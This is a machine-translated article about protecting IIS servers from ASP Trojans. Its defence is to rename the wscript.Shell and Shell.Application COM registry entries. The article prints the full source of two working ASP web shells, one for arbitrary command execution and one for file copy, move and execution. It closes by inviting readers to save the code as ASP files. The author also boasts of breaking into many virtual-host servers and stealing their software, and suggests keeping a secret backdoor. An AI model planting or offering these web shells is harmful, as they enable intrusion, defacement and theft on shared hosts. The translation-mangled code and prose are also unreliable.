How does the server guard against ASP Trojans?

How does the server guard against ASP Trojans?

With the development of ASP technology, more and more websites are developed based on ASP technology on the network. The support for ASP technology is already a basic function of IIS server in windows. However, there are more and more Trojans and backdoors based on ASP technology, and their functions become more and more powerful. Because ASP itself is a tribute service function provided by the server, the trojan and backdoor of this ASP script will not be scanned and killed by anti-virus software. Hackers call it "a backdoor that will never be scanned and killed ". Due to its high concealment and difficulty in detection and removal, it poses a serious threat to website security. Therefore, the prevention and removal of ASP Trojans puts forward higher technical requirements for our network administrators. Next, based on my personal experience, let's talk about the prevention methods for the two typical ASP Trojans, hoping to help you.

The following is the first Trojan Code :

<Title> Asp shell </title>

<% @ Language = VBScript %>

<%

Dim oscript

Dim oscriptnet

Dim ofilesys, ofile

Dim szcmd, sztempfile

On Error resume next

-- Create the COM objects that we will be using --

Set oscript = server. Createobject ("wscript. Shell ")

Set oscriptnet = server. Createobject ("wscript. Network ")

Set ofilesys = server. Createobject ("scripting. FileSystemObject ")

-- Check for a command that we have posted --

Szcmd = request. Form (". cmd ")

If (szcmd <> "") then

-- Use a poor mans pipe... a temp file --

Sztempfile = "C:" & ofilesys. gettempname ()

Call oscript. Run ("cmd.exe/C" & szcmd & ">" & sztempfile, 0, true)

Set ofile = ofilesys. opentextfile (sztempfile, 1, false, 0)

End if

%>

<HTML>

<Body>

<Form action = "<% = request. servervariables (" url ") %>" method = "Post">

<Input type = text name = ". cmd" size = 45 value = "<% = szcmd %>">

<Input type = submit value = "Execute Command">

</Form>

<PRE> <%

If (isobject (ofile) then

-- Read the output from our command and remove the temp file --

On Error resume next

Response. Write server. htmlencode (ofile. readall)

Ofile. Close

Call ofilesys. deletefile (sztempfile, true)

End if

%>

</Body>

</Html>

Enter the Dir command in the command line and execute it to view the directory !! It can use various doscommands, such as copy, net, and netstat.

However, its default execution permission is only guest, that is, the execution permission of the iusr_computer user. Of course, if you add the iusr_computer user to the Administrator group, you have the administrator privilege. This trojan is convenient to use. It is almost the same as the doscommand line window xx. However, if the server limits FSO (no component upload), it cannot be used. In addition, there is no way to use the virtual host added after the server. It can only be used in "Default web site", so it is applicable to a narrow range.

For the prevention method, let's take a look at its code to know:

Set oscript = server. Createobject ("wscript. Shell") "creates a wscript. Shell object named oscript for command execution"

Set oscriptnet = server. Createobject ("wscript. Network ")

Set ofilesys = server. Createobject ("scripting. FileSystemObject ")

The preceding three lines of code create three objects: wscript. Shell, wscript. Network, and scripting. FileSystemObject. You only need to rename or delete the items that control wscript. Shell objects in the registry. For example, we should rename or delete the "wscript. Shell" item and "wscript. shell.1" item. Because we only modify the "wscript. Shell" item. Then hackers only need to modify the code as follows: Set oscript = server. Createobject ("wscript. shell.1"), and the backdoor Trojan can be executed again.

As you may have already thought, we are working on "wscript. shell "item and" wscript. shell.1 "cannot be easily guessed by hackers, because, for example, you put" wscript. shell "changed to" wscript. shell888 ". Hackers only need to change the code to: Set oscript = server. Createobject ("wscript. shell888"), Trojan Program You can execute it again. In addition, after the registry is modified, the Web service must be restarted to make the setting effective.

Next let's take a look at the code of the next ASP backdoor Trojan:

<% Response. Write "<font size = 6 color = Red> only one XX operation can be executed at a time. </font>" %>

<% Response. Write now () %> <br> physical path of the program:

<% Response. Write Request. servervariables ("appl_physical_path") %>

<HTML>

<Title> ASPs Shell. Application backdoor </title>

<Body>

<Form action = "<% = request. servervariables (" url ") %>" method = "Post">

<Input type = text name = text value = "<% = szcmd %>"> enter the directory to be viewed <br>

<Input type = text name = text1 value = "<% = szcmd1 %>">

Copy

<Input type = text name = text2 value = "<% = szcmd2 %>"> <br>

<Input type = text name = text3 value = "<% = szcmd3 %>">

Move

<Input type = text name = text4 value = "<% = sz1_4 %>"> <br>

Path: <input type = text name = text5 value = "<% = sz1_5 %>">

Program: <input type = text name = text6 value = "<% = sz1_6 %>"> <br>

<Input type = submit name = Sb value = Send command>

</Form>

</Body>

</Html>

<%

Szcmd = request. Form ("text") directory browsing

If (szcmd <> "") then

Set shell = server. Createobject ("Shell. Application") create a shell object

Set fod1 = shell. namespace (szcmd)

Set foditems = fod1.items

For each CO in foditems

Response. Write "<font color = Red>" & Co. Path & "-----" & Co. Size & "</font> <br>"

Next

End if

%> <%

Szcmd1 = request. Form ("text1") Directory copy, file copy is not allowed

Szcmd2 = request. Form ("text2 ")

If szcmd1 <> "" And szcmd2 <> "then

Set shell1 = server. Createobject ("Shell. Application") create a shell object

Set fod1 = shell1.namespace (szcmd2)

For I = Len (szcmd1) to 1 step-1

If mid (szcmd1, I, 1) = "" then

Path = left (szcmd1, I-1)

Exit

End if

Next

If Len (PATH) = 2 then Path = Path &""

Path2 = right (szcmd1, Len (szcmd1)-I)

Set fod2 = shell1.namespace (PATH)

Set foditem = fod2.parsename (path2)

Fod1.copyhere foditem

Response. Write "command completed success! "

End if

%> <%

Szcmd3 = request. Form ("text3") Directory move

Sz4244 = request. Form ("text4 ")

If szcmd3 <> "" And sz1_4 <> "then

Set shell2 = server. Createobject ("Shell. Application") to create a shell object

Set fod1 = shell2.namespace (sz1_4) for I = Len (szcmd3) to 1 step-1

If mid (szcmd3, I, 1) = "" then

Path = left (szcmd3, I-1)

Exit

End if

Next if Len (PATH) = 2 then Path = Path &""

Path2 = right (szcmd3, Len (szcmd3)-I)

Set fod2 = shell2.namespace (PATH)

Set foditem = fod2.parsename (path2)

Fod1.movehere foditem

Response. Write "command completed success! "

End if

%>

<%

Sz1_5 = request. Form ("text5") specifies the path for the execution program.

Sz1_6 = request. Form ("text6 ")

If sz1_5 <> "" And sz1_6 <> "then

Set shell3 = server. Createobject ("Shell. Application") to create a shell object

Shell3.namespace (sz%5). Items. Item (sz%6). invokeverb

Response. Write "command completed success! "

End if

%>

To view the directory, just enter the corresponding directory and click send command. This Trojan can copy, move, and execute programs. However, many commands are unavailable, such as del, net, and netstat. This trojan is simple, but it is enough to use it to hack a website. For example, we can move the home page of the website to another place, and then copy a hacker webpage with the same name.

The most terrible thing is that this trojan applies to any virtual host. That is to say, as long as I am a user of a virtual space on the server, I can upload this trojan, use it to modify the homepage of any other user. So if the service provider that provides the virtual space has not been patched, it is really dead.

However, in my practice, many virtual space service providers in China, especially some small service providers, have not been patched. I used this vulnerability to get the admin of many virtual space servers and helped them fix the vulnerability. Of course, I also got what I wanted-a lot of good software and code. Many of the ASP programs I use today are stolen from them, which is hard to hear. It should be said that they are down.

To put it bluntly, how should we prevent this ASP backdoor Trojan? Let's take a look at this code: Set shell = server. createobject ("shell. application "), just like the method just now, we just need to put" shell. application "item and" shell. application.1 "can be renamed or deleted. Remember, if you change your name, you need to make it more complex. Don't let the hackers just guess it. By the way, it is recommended that you change the name of a zombie and write down the name. In this way, it becomes a secret backdoor. Finally, I would like to summarize the two asp Trojan Horse backdoors and how to prevent the ASP Trojan Horse backdoors: The first Trojan is more powerful, but has a narrow application scope and requires FSO support, that is, "scripting. supported by FileSystemObject. Although the second trojan has fewer functions, it creates a "Shell. Application" object. Applicable to any virtual host. (The harm is indeed too great. You have to pay attention to the provision of administrators who support ASP space !)

In fact, we may have come up with the prevention of the two asp Trojan Horse backdoors. For the prevention of ASP Backdoor trojans, we only need to put "shell. application "," wscript. shell "and other dangerous Script objects (because they are used to create script command channels) are renamed or deleted, that is, the system restricts the creation of" script shell, the ASP Trojan becomes useless, and it cannot run.
Note: You can directly copy and save the preceding Code as an ASP file.